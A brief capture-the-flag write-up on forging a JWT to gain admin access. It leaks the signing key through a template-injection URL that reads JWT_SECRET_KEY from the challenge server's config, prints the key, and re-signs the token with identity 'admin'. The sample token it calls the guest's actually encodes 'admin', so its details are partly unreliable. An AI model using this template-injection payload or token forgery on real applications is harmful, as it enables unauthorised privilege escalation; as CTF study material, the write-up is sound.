Tags: authentification jwt 

Rating:

- this is that we got from login as guest user:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQzMDI4MjAsIm5iZiI6MTU4NDMwMjgyMCwianRpIjoiNGEyYWJhODYtMmI2OC00NGQ5LTkwZGMtMTFkMzg5NzQ5NjgyIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9Cg.{a verification sign}

part one : {"typ":"JWT","alg":"HS256"}
part two : {"iat":1584302820,"nbf":1584302820,"jti":"4a2aba86-2b68-44d9-90dc-11d389749682","identity":"guest","fresh":false,"type":"access"}
part 3 : a verification sign that concat part one with part two and give it to HS256 encoding function that uses a unique key !!

- so we need to change the parameters to this :

{"typ":"JWT","alg":"HS256"}{"iat":1584307608,"nbf":1584307608,"jti":"d0274da7-afe1-4af6-8d81-106b282533c9","identity":"admin","fresh":false,"type":"access"}

and using this key to sign verification progress : ( http://66.172.11.208:5000/{{config.get('JWT_SECRET_KEY')}} )
this_is_a_$uper_secure_key

and finally send JWT that we generate within a request to server and we got flag ... !
(best tool for generate JWT : https://jwt.io/)